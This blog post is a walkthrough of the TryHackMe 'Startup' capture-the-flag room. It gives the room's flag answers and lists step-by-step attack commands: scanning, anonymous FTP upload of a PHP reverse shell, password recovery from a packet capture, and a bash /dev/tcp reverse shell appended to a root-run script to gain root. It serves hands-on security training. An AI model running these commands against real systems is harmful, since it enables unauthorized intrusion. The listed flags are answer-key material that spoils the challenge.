Startup - TryHackMe Problem Solving
Startup
Abuse traditional vulnerabilities via untraditional means.
🎂 🍔 🍕 🍗
Task 1 Welcome to Spice Hut!
We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (in case you get hungry), but that is not why you are here. To be truthful, we aren't sure if our developers know what they are doing and our security concerns are rising. We ask that you perform a thorough penetration test and try to own root. Good luck!😐
Answer the questions below --------------------------------------------------------------
1. What is the secret spicy soup recipe? 💓
Answer: love
2. What are the contents of user.txt?
Answer: THM{03ce3d619b80ccbfb3b7fc81e46c0e79}
3. What are the contents of root.txt?
Answer: THM{f963aaa6a430f210222158ae15c3d76d}
Task 2 Credits
Spice Hut was very happy with your results and it is guaranteed they will spread word about your excellence with their partners. Astounding work!
Thank
Y😜u
Find my (tryhackme) official writeup
here: https://www.youtube.com/watch?v=3qNxI1OggGc
I'd like to thank ku5e for being a good sensei and GeneralClaw, my grammar cop.
I'd like to thank my testers Amit25095, BarZigmon and powershot.
Additionally, I'd love to thank TryHackMe not just for their platform, of which has changed my life, but for giving me this opportunity to give back to the community.
And of course, I'd like to thank you for playing. Hope to see you soon!
Answer the questions below ----------------------------------------------------
4. Congratulations!
Answer: No anser needed
How are we going to solve this problem?
1. First of all, we will open "openvpn."
cmd: sudo openvpn "openvpn file.ovpn"
2. After joining the room, we can deploy the machine.
3. We will do a scan with Nmap.
cmd: nmap -A -T4 IP address
get ftp name: anonymou
4. We will find directory with gobuster
cmd: gobuster dir -u http://ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
we are get "files" directory
5. Go to browser and enter IP/files
cmd: ftp ip address
Name: anonymous
Password: anonymous
ftp> ls
ftp> get notice.txt
ftp> cd ftp
ftp> dir
6. Search Google for "php reverse shell," and on clicking the github link, open the php-reverse-shell.php file and download.
cmd: ifconfig
get your pc tur0: ip address
7. php-reverse-shell.php file's IP address change with my pc IP address and set port number. (This php file location Downloads directory)
ftp> lcd ~/Downloads
ftp> ls
ftp> dir
ftp> put php-reverse-shell.php
new1 cmd: nc -lvnp [port number]
8. Check the IP/files/ftp link in your browser for php-reverse-shell.php upload confirmation and click on this file.
new1 cmd: pwd
new1 cmd: id
new1 cmd: ls -la
new1 cmd: cat recipe.txt
get first ans: love
new1 cmd: cd home
new1 cmd: ls
new1 cmd: cd lennie
new1 cmd: cd ..
new1 cmd: ls
new1 cmd: cd incidents
new1 cmd: ls
suspicious.pcapng
new1 cmd: ls -la
new1 cmd: python -m SimpleHTTPServer
new2 cmd: wget http://IP:8000/suspicious.pcapng
new2 cmd: ls
new2 cmd: ettercap -T -r suspicious.pcapng
get TCP IP:Port Password: c4ntg3t3n0ughsp1c3
new3 cmd: ssh lennie@IP
Input: yes
Input: TCP Password
new3 cmd: python -c 'import pty;pty.spawn("/bin/bash")'
new3 cmd: ls
[ user.txt scripts ]
new3 cmd: cat user.txt
Get user.txt "text" 😍
new3 cmd: id
new3 cmd: cd scripts/
new3 cmd: ls
[ planner.sh startup_list.txt ]
new3 cmd: cat planner.sh
new3 cmd: cat startup_list.txt
new3 cmd: cat /etc/print.sh
new4 cmd: ifconfig
9. we are install "Revers shell" add-ons on browser and set PC IP Address and port number.
new3 cmd: echo "bash -c 'exec bash -i &>dev/tcp/IP/Port <&1'">> /etc/print.sh
new3 cmd: cat /etc/print.sh
new4 cmd: nc -lvnp [port number]
new3 cmd: sudo -l
new4 cmd: ls
new4 cmd: cat root.txt
Get root text 😚😍
Comments
Post a Comment